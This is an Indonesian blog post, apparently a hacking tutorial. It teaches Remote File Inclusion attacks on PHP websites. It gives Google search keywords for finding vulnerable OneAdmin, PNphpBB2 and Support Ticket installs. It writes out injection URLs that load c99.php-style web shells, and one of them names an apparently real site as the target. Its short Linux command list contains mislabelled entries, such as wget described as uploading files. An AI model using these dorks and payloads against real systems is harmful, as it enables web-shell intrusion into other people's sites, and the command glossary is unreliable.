Beberapa command yang seharusnya di ketahui yaitu :
cd NamaDirectory = Melihat / Pindah ke Suatu directory
ls -al = Melihat Suatu Directory secara detail
find = Mengecek/menemukan suatu Directory
cat = Membaca isi suatu file
wget = MengUpload Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[ShellInjection] = Shell.php / c99.php
Sebaiknya kita cari website PHP karena RFI ini sangat baik untuk PHP :O
Silahkan Googling, ataw sebelumnya cari dulu RFI di http://www.milw0rm.com
- Site Oneadmin RFI
Silahkan Search di Google dengan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasih contoh pathnya http://situstarget.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[ShellInjection]
- PnPhpBB2
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka.
contoh pathnya http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[ShellInjection]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[ShellInjection]
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka.
contoh pathnya http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : http://target.com/include/main.php?config[search_disp]=true&include_dir=[ShellInjection]
Tidak ada komentar:
Posting Komentar